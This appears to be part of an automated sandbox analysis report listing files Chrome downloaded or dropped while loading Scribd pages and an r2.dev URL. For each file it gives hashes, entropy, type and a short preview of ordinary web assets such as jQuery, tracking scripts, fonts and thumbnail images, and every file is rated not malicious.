                                                                                                                                                                                                                                                                                                                                                                                        Preview:......Sg..0000.woff2....s.wOF2...................<.........................`.......$...6.$.t.<.. ..F. .....Q.NR..gB&......~..c..L......s.K...v...~........sQ>..".!.....X........I,.k.....t...n&X.-..E.N..?k..-..Xi..ts^......L.....d"...... .x4.a.A.../.)0...aD&+...#...FW...N.L....2...o..+0..'.!....A.Z.......L&..-..C3.3...`z..#..z..sgv.\.`B.... .....#.@. z.`....z2.S-S..z.D..(q'..Wr..El........g.....{.......g..5p.m.ilit...A.yb.)(.N..h.....,.9.."..g}.b8..p.....E..hY..g...]\0....I...R.c.........:...:.'....z|..........,..co...l.....C....c.ohs...a....G8.......C..NT~~9.......AE..n...".\.9WNe.......u..29J^..q.j!c........']......>=?....}...A>U..Q..d.Q.......H.u5@....%....3AmD./.=j.w...!p.'..$.nn6K.1........2.7.W..o.d.A.;.....Uy.s...c..^....g... c##............O..9d8G.?..gI..N!._9...e..%...6o6.$c..h.V+.[:J6.gq1.....R|...M........?.j.c-.........JK.:.[....U........$.<.w.u...&..g.z...N.wj...Z....D..?.T_..\.gud.V.[.g.J......'.%.......9.[.7y...m..2;u....>"F.
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):220
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.097050793253651
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:qzhZhqVHN+AoSazTBxYT1ADKLfgSazTGxILBADKL9U3pTGnezIXF6UuDtTBzkGc0:qxswnzfYTKsyzKx22s9IKnezqF63S+9
                                                                                                                                                                                                                                                                                                                                                                                        MD5:1EFF6EFEAC587CFF43F6DD5A15851140
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5A8CD76AB7426218B6735FD72F57C3EEACF19A07
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9CC64F778AF120796DBA543FCE013CD76290930948C0BE1BB3EACFACFA311500
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E2B29997C7E3A5B54BBF5931FF20C4998250FB2AC63705C66000717CFD004D4B28BE38BF9637E56E39374EC0E7F480A25BB2D6BBC152BA497DFE40A82BAAA3C3
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:var _sTrackingAlreadyPresent=(typeof window._svd!=='undefined'&&typeof window._svc!=='undefined');var _svc=window._svc||{};var _svd=window._svd||{};_svc.workspaceKey=_svc.workspaceKey||'7de87bc73aff1974945059e230fb953d';
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 149x198, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3922
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.949657993062315
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:qbXnHddEOeSoRaAU3TRBJa/eqCX205PBpXNkRa7O:qbX9dEBRaAU39B8/eqW2YAl
                                                                                                                                                                                                                                                                                                                                                                                        MD5:FEF22B7980CA66F601708F3A8D83854D
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:01D214C6D6FD085F648D301B8738E276F8002CF0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:2FFF60417E388196E291DB93B99C1C011614AFAF9E0D89441DB62372637D8F79
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CAE96559F4A27877E6AFA809C3627F69CDB37FA39E8329EC7D4167C9920F50FD35DACDFF713AF5F972210C53339FDC65729564EC5D27C61FA3B4E881CDC0DE8D
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://imgv2-1-f.scribdassets.com/img/word_document/357813054/149x198/d1d2a4e180/1732363287?v=1
                                                                                                                                                                                                                                                                                                                                                                                        Preview:RIFFJ...WEBPVP8 >....B...*....>m..H$""!)......gn.Z.......?8).f1."=3.....?........w./.[..._........V.=.......Y........g........+...#...~c..]...{....?../....._.3...!.S.o._.....?.......g....t.............g...'.l..Pu.Z....._.....T....)...}(..F..Xr...V`.#i.d....;.x4c.....,u.\nrYS.....~..0....T...j....9M..*....l..Dz..../...&..."S...Y]6..t.J......?...7........-=....J...$M.. .....o..z.....6.p..,M?t.......*..Q.......P.c...m75.....Lz.J/..w..Kd...}..a(..4.m...............,.....))-.v.]?..C.1.`c...bc.H.p...J......9a.iEO..Y......;..>..x.U......@...F....*.......O..w.W..hQ.+....1.e...O....?..:..-Lg.){..~-.......TP..<...1.9kh.._...B...#Ox...I.......S.v.yv.....Mq.8....-....&q.xd..`.=..[..n...F..%.q..7..._~.....C%.3\.=.#..l.9.9f. V..g..G/..>n.S.{gu]...\....Ix%.t.'6..[.....,Z....\.N....:.W..f..4..&n'..Z..t.jD..P."..Ev.)G6M..U.i.........{q..P:..3x9`B...Ao...A..}.....R. .,..N...].akry..W.ue/..._......a. ..l.g.Wf...j.9.....S.j..I..(...Fm.!4.,)6.u...r..id...g}Z..7=.
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):436968
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.887390472202456
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:/ElUrQyRPqbgcnbsHtiuD8bKx3E0ysSM/nARUra83VIzoWvCAcgIAFDgvIuoavCY:/ElIKcK3jwC8uGG6P
                                                                                                                                                                                                                                                                                                                                                                                        MD5:41BDCB0E90D067E7C07D83EA0BA718E8
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4AD1B8C69FAEDA0F2AFFC7C7206551D13C687D85
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:666DA7EC78539B443F9A9482E16829634FFC272E8E4B3D766FC445508421FBFA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1E29323F54EF739FFC07C48FBB598629D7ED247298D2DF6021E023C47C4A547E41A33F9D93D0918CF0343112BA6843BE6F4A57E86DC7E3073654D3C78F29D008
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/594.df1383.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[594],{37594:(e,t,n)=>{"use strict";n.d(t,{h8:()=>Ks,ry:()=>nu,uV:()=>kd,yA:()=>Fd,yq:()=>Gd,Iu:()=>Ga,_5:()=>Ua,OA:()=>Fa});var r=n(38544),a=n(38979),i=n(40880),o=n(39067),s=n.n(o),l=n(96540),c=n(36764),u=n(83804),d=n(51115);function p(e){return{type:d.A.CREATE_PAGE_FLASH,...e}}var m=n(11865);const h={COLLECTION_ADDED:"collections/COLLECTION_ADDED",COLLECTION_REMOVED:"collections/COLLECTION_REMOVED",COLLECTIONS_LOADED:"collections/COLLECTIONS_LOADED",COLLECTION_UPDATED:"collections/COLLECTIONS_UPDATED",DOCUMENT_ADDED_TO_COLLECTION:"collections/DOCUMENT_ADDED_TO_COLLECTION",DOCUMENT_REMOVED_FROM_COLLECTION:"collections/DOCUMENT_REMOVED_FROM_COLLECTION",UPDATE_COLLECTIONS:"collections/UPDATE_COLLECTIONS"};var g=n(19567);function f(e=1,t=!1){return n=>m.nF.asPromise("get",{url:`/user-document-collections/collections?page=${e}`}).then((e=>{const{collections:r,collections_count:a}=e;n(function(e,t,n){retu
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 149x198, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):6666
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.966716633823144
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:h3tUmXztLXYjqVnpvQ452IvZF5aMN68wN:YkWuVpoavZF5a188
                                                                                                                                                                                                                                                                                                                                                                                        MD5:EC87C6A6A1062E28F22EC84789C0013A
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D0C6E02BD96E96F27984C05BB6A6E877A6DFB738
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7A289EAB1002439DC80B1C5DB459BB61264D17A4DBEA6D3A220422E5953FE549
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F1D4CD3A3E78B4ABCEED7640940D2ACDED38AAC60C19910385B1E9B44C9B883A6BD4A7FC9675FCFCBF25A3A8F6C4562814BCA73845D080E4F05C9249BAD55309
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://imgv2-2-f.scribdassets.com/img/word_document/211302755/149x198/e130bab094/1733400677?v=1
                                                                                                                                                                                                                                                                                                                                                                                        Preview:RIFF....WEBPVP8 .....Z...*....>m..F$"..-.Kh...l..i..>F.........t.6...G.~..c.w.....?;.....].t...r...w..................d~..........W......q/.O...?......~..c...................W.=....%.>..e./.?.}..3........{;...=......_.<+.../....p.........?._._.=.?....Q...>..=.....6.E.u.[......V.PA6....h.]?..k..[.U.p)/.).S.f.....!.T..Ph.J....%e..t.{'.A...."7.w. .. .2..Vc}/...h....W...t..3o.......i......0..W..C....w.&).].\d..T_.>.r.....}..&4.y[I....MT.t.R...Zo.`..*..J...E*8........}u./...GC..R.G.....I.4Ld..6.Ff.lRo;.~=.3.. ]....L.|8RV...,yp.1.F........y.S5.1>%Pt&.......j....sU.X. ..^....!..u....*z.R..\_.....N0.....T.....b......C-c>Z.ze*.....F.N.k.e`G[......v...4X.x.o.n.TXZ..uK..$m................R#...-d..!.I..Z..z...zcd.............M.p.....,....2.b|.....9{T7.Y...d..%......I.....Tg.'sZ....zO(,.4..H../p...0.v......^r.0k..`..Z\t..;...=...).".I...Q..0.....?.+...|{..72..9....d...<p............h!........u}.. ......+..U.C........K....;x.....;..gV.4d-....[....s9..}..
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:gzip compressed data, was "s.js_.gstmp", last modified: Thu Nov 14 17:34:44 2024, max compression, original size modulo 2^32 78992
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):26602
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.992300527861587
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:fl13xj429FB+rcDCTWo5sYIb76Q0F+dtSO4vjGt0lSK+xe+Ksow1/4e/9ST8y0:flbR+JsYICQ0F+SO4vjGGUbN0w1/z/9N
                                                                                                                                                                                                                                                                                                                                                                                        MD5:7D757D5340E56BB7A1ED7CAD7F2E709B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:28835264E7B827D4C5A1D05256495350E616545D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D96AE14106A03E4E3123F4DA7F69FAA97BF5A5D038A34E7A015A9891FE6C6F66
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:50656F1F24BE947F552CEC572505FE55E20672ECDD09D1D80DCE249321D3931BFA783186645B898CB5C283B71E5123DFED4F313B487146EC55D4AEDFA8AB384B
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.....46g..s.js_.gstmp..ic.H. .}~...........A.Y..<c...U.4... ...X8tX.....y ....g..v.D ..D.qeD......z.z.O.b.d.I2.Z.4Y8.|.>,..5..<_f...<..+k.,....~o..z.N.8..."..i+..Z..?.t..u...d.%."..V..."V#.[.y..X..../Ot.}T...".I..Z.....2.#..`.A......a.Q.?.pr.)\..W..].>^'..;.6h...........>...s>..m.F..:o...u6M.......?./6f...2....,L..<.........2h%.W.~....}....t.E.............,.'7.tu..h..,.......~.?.N.:0k.4...w.E8...'.;_.[?...2..u.........Ag.,|h!..A'...N...\i.*.z.....AmE.......d...0.f=Z...!.y.'F......Kb?k........5J..E...h..?lA.A..1<da....[.d...M.<J.....aW4.KeDjoy..{...bG..._vfEL.\7..".ZY...\so...x.6........Hf.y.\...0...NS.;.3C..l...4..h6.?.....m.z`<.A^.q+..../_..2........[.Z.I. ..v....}.c....."=05h./.\3....`...{...2I..Z].X.fj&.d.._...W+=.l3.xIO..x.......H..p.o...].k1<...`+)..m.vw.ZQyo.VN..n....H5.pw..>`..o|.Hc@n.p...x.M..h..e...c...E....r4c=...5.....SV4.pH.5..y....x...Y....H..i.g.qp...6f.w....n..;V...JJP^<.....}`X........Q..:M.Z...4MR]{.#.i..h-h...).i+N..U.*.W@.|...I..-
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (32065)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):85578
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.366055229017455
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                                                                                                                                                                                                                                                                                                                                        MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 149x198, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5626
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.9607308572643625
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:/crW9613kF8hUL/jmh3LYcUN63HtKKMK/nrbCu8E9GWJVPjW20hZIcqc3ukqL7Ee:ErW9EUFQW8LYcUs3Ht7MK/r2uZ9pPjJl
                                                                                                                                                                                                                                                                                                                                                                                        MD5:85E1C87DB346FDA3D4A6412B23DF4503
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:412C3187D07876F39D415F2320EF4CC72835D0B1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C62F22D58453ED1687B81396D27EECD73A5630BB2D15DDF7514A703ABE6E92C1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8FEF15D1D01DECB27AAF97473C8916575CA42600573D664D8029E67364DCB3A2EC6663B7AAF3A155FE542D00BC25E6CAE72E7A6E40772A72EA0374BF9A6E3855
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://imgv2-2-f.scribdassets.com/img/word_document/335808746/149x198/ec87a4c99b/1731725376?v=1
                                                                                                                                                                                                                                                                                                                                                                                        Preview:RIFF....WEBPVP8 .....V...*....>m0.F$#!.)2.@...d....zb..s.{O.......x.;........_..r_...?R:Xy....?....O....}/=U}.|.=......4......x..7....a.3.~f.4.U.o..........?i.!...>.-........w....._.?.x.j#.O..l.`..~.....w._`O.?.?....h......?.........3............\..J.sO...V....c..jC....V8....h.Df..]...o.";t|...BN.../.....xk........._..p...1?^7^.r..L.<.D-.j..z.`G.-0...$NV.....?..S.\g.=p.u..Zb.....G@"...(w.7..9..$/...4.$i.gq.M.(ab..k.|...xQ...@.."P......... ..j*...Be..z../1....=.$............&.....[.j2."..I....^.+]........q....oU(..w..O..N=r...;.......G.<.0.?U.....e..!H....l7..].$.nm..n..7...X.....Gb5..C..9....k.........\0.UQ.H.C..7.ui.&....t..C0...c .$L...e.N,....u..U._W...G...~...:@...K.vKn...9q2.....<.L.X...,.,....G*.r.&.....F...9.[|s.Ne.nX.....N.?....?..)..Erul.q..`..['.....k=.$..e....z..R..N0.....4...jF.a.-....u....2.........:...R...F.....X.q....B0....W..........Jy.!..:fH...:U....f[.i...,......xP,..}..15.5.B.u..p.=.I..H.aD........#
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10235)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):440062
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.635559947386148
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:O4B3ZuduK3zYq/Ez+hbxpYRGPVmT4yahWLml9RM:XBJK3UqGgxy4Q
                                                                                                                                                                                                                                                                                                                                                                                        MD5:51645D03BF435EB91C771B0E94E4DD38
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:7BC0CC8A60F99805E67E34AC06D67039FCF89387
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1ED5E814D8C5BC6679B321EDA988F8414A291BDF49C9C14FE2EAFDCE66CEB558
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8CF9B0D3085D75AD30BD898CC86067B603428899F1D16E879B8BD272467A04405B25D78B326FF6AD9FD2505C6727ED8D1FA61C15DCAB3B304D88BBB407567D9B
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":18,"vtp_value":true,"tag_id":11},{"function":"__ogt_referral_exclusion","priority":18,"vtp_includeConditions":["list","scribd\\.com","paypal\\.com"],"tag_id":13},{"function":"__ogt_session_timeout","priority":18,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":14},{"function":"__ogt_dma","priority":18,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":15},{"function":"__ogt_1p_data_v2","priority":18,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (611)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):27150
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.357340680151037
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:6bamwIluB0sJQqCeSQup5szCUXAG0VVi82OgoKACZQQofNJXY3gW3:603Mp5If8WOmgW3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:46DD133EE00DC1BAE5E4EEBA7B88432F
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8AF86A4AC91CE48C062216FB94A6E1D57618A19B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CB49F9E3812E2C262AF374E79BD8905CB508A45BF2C2D6AF62EED85AF43770872486A55E9425882FEDA9FB3A57A317A3C18BE1E286ADAF0C76BE7F1B0DFA8474
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/favicon.ico
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9251)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):244801
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.453841413977933
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:/FLeYH8SRWJ/37OeR8NteqZEbkxZNsucrl0xYurPK713cCq:/FLeYcYWJzH8NNfFcrHurPK713Rq
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C9C37DBE6B077A4AAEEEA29AF4857656
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E9A790D720E436BA047D67C4D441E840D660433D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C4EB49795F7A703429E7012CEC0A556E6FAF6F551F07CD337F66C5A1EC3A5847
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:660F8CD397BAFA6D8F44BA4C2CD066AAF934A69B5E608D6CE63636240E339ACFF93AE9B72F6B01C4E29BF9C89B11A73C2D5D3F36EFEAD5194D138B38F7E0DFA4
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 510 x 360, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):29999
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.968378291485809
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:Q18PJTE5ISPIm60xsREe1TWp/J6X7ioR3VWnUXVq6YhEC+L1Xqs8yhoIkjWUfWq+:Q18PVY6pRRQ0Liy3VzXVq6YhEC7RZ4t
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D1E083F52AAED174A437AE88EBFF5785
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:BD4DCD514C09C95C5D9CEB3968EBB024F3F0B675
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A7F9BE2AFECD14A26A5F9F8A97A421A4E1DB6226377ADD77257C41654FE73354
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1527FBCFD442BA9983615EDAA510BD04A6D4199C05D51186988CBAA5AA5D8617C2481A4CF58536002FAB30520111F2455EF84844FBED1358E81F819FDF11EF3F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/assets/images/shared/gr_table_reading.9f6101a1.png
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.......h......P.{..t.IDATx..kl.e...(.E@..(.`...!@....&Dq.eg.. ...HM..A......% .*03.PAf..R/(...#1)./.5.oQ.D.E.....CKw...ew...$o&iH..w...!... ....G1.[C..X1.M.n....k........b.....0?...N............%.=g..nSM{.bX...6..!.rs.b..+.....{.'...H.'...7..O....$>.qz......q...d.6D.........i......K.Z1..)w.b3.......7..V5'......5...['.%+.rD.b..??...7.gu..<...*......k..(z..gz7..?.6..;....M....EJn%..L...,.U.{.V1.!.W.k.>...h.....s..8..........\(.}.....W....t..'.w...........m.}.........~r.....8....\.;....m..'4....gg".P@..3H1..8...a.WMG!.`. Sf.-C8.l.V.?^Ll.t.UM... ....<..../.Er..I...A:.%v...F...S$.n..^Q.....EF...~..H...,.....P.' ..=.....\....!....W...O.A.......0~.4.,.....-..-.$.....8........-fc....A3.rq}...~[u...|.........../Z.SF....E.;S8!..r.M.&......|..X.S.q!.. ......|....4.L.T8&.....h.&...u\..S..O.D...WM....j...u.i..-..?m.ia/...j:Ub .-....o#.2..+dX..}L.5?..y.g.V..WyxmI......Y.rfF.a....c2@..dFK8c.^.#.x!...y..o.......+ZR..@N.........M.i?D..@..7
